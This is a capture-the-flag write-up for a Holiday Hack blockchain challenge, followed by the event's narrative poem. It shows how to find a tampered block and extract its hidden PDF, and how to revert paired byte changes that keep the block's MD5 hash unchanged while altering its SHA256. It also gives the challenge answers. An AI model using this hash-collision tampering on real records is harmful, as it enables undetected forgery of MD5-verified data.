Objective 11b: Naughty/Nice List with Blockchain Investigation Part 2

SHA256 of Jack's altered block is: 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f. What is the SHA256 of the original block that was altered by changing only 4 bytes?

Still using the blockchain.dat file, running strings shows it holds PDF files. Since the SHA256 of a block is required for the answer, the individual blocks need to be saved to files as well; the script's dump_doc and save_a_block functions do this, as the comments in the script state.

With this information the for loop in the script can be updated to not only print the blocks but also write the PDF and block files, by calling dump_doc and save_a_block on each block inside the loop.

This creates a lot of files, so move the .pdf and .dat files into separate subfolders. Then run the following in the folder containing the .dat files:
sha256sum * | grep 58a3b9335a6ceb0234c12d35a0564c4e

This matches 3f2block.dat. Copying this file up a folder to work with later, a file 129459.bin is also present. Examining that file with strings, alongside the block file, shows that two documents should have been extracted by the original script. However, only the .bin file was written; the PDF for 129459 is missing from the pdf folder.

To obtain the PDF, it must be extracted from the block file. First comment out the PDF/.dat file writes in the naughty/nice script, then run the script as follows:
python3 | grep -A 20 129459 > 129459.block

That command extracts the necessary information to a temporary file. Next, remove all data from that temp file except the actual hex data of Data Type 2 (I did this in a text editor). Then:

  1. Create a new file called 129459.pdf with at least 1 byte of data
  2. Copy the data from the temp file
  3. Run hexedit against that newly create file
  4. Paste the copied data into the hex editor, overwriting that one byte of data, and save

The missing PDF should now open

Before making any changes, take note of some file information:

  1. md5sum 3f2block.dat = b10b4a6bd373b61f32f4fd3a0cdfbf84 (this should not change after the first two byte changes nor after all four)
  2. sha256sum 3f2block.dat = 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f (this should change, and the final answer is derived from it)

For the next and final steps, it is recommended to review the slides linked here; page 194 shows how to make the changes (download as a PDF and zoom in).

First, follow the easy-to-read part of the slide and change the page count in the PDF from 2 to 3 with hexedit. This changes the rendered PDF to the following:

Now decrease the byte 0x40 (64) bytes after the first change. In this instance the first change was at offset 0x3F, so the next change is at 0x7F. The value there is 1C, so it needs to be decreased to 1B.

Making these same two byte changes to the .dat file should not change its MD5 (the block was crafted so that these paired +1/-1 changes 0x40 bytes apart keep the MD5 the same). The 0x40-byte spacing stays the same, but the offsets in the .dat file differ from those in the extracted PDF.

For the remaining changes, look at the block again using the script. The Sign field needs to go from Nice (1) back to Naughty (0), since the original block had Jack on that list.

This is done with hexedit at offset 0x49, decreasing the byte from 31 ('1') to 30 ('0'). As with the PDF change, move 0x40 bytes on and this time increase that byte by one.

These changes do not alter the MD5 of the block, but the new SHA256 is the answer:
sha256sum 3f2block.dat = fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

Thanks for the challenges Holiday Hack crew!!!

Full Narrative

KringleCon back at the castle, set the stage...
But it's under construction like my GeoCities page.
Feel I need a passport exploring on this platform -
Got half floors with back doors provided that you hack more!
Heading toward the light, unexpected what you see next:
An alternate reality, the vision that it reflects.
Mental buffer's overflowing like a fast food drive-thru trash can.
Who and why did someone else impersonate the big man?
You're grepping through your brain for the portrait's "JFS"
"Jack Frost: Santa," he's the villain who had triggered all this mess!
Then it hits you like a chimney when you hear what he ain't saying:
Pushing hard through land disputes, tryin' to stop all Santa's sleighing.
All the rotting, plotting, low conniving streaming from that skull.
Holiday Hackers, they're no slackers, returned Jack a big, old null!
Written on January 13, 2021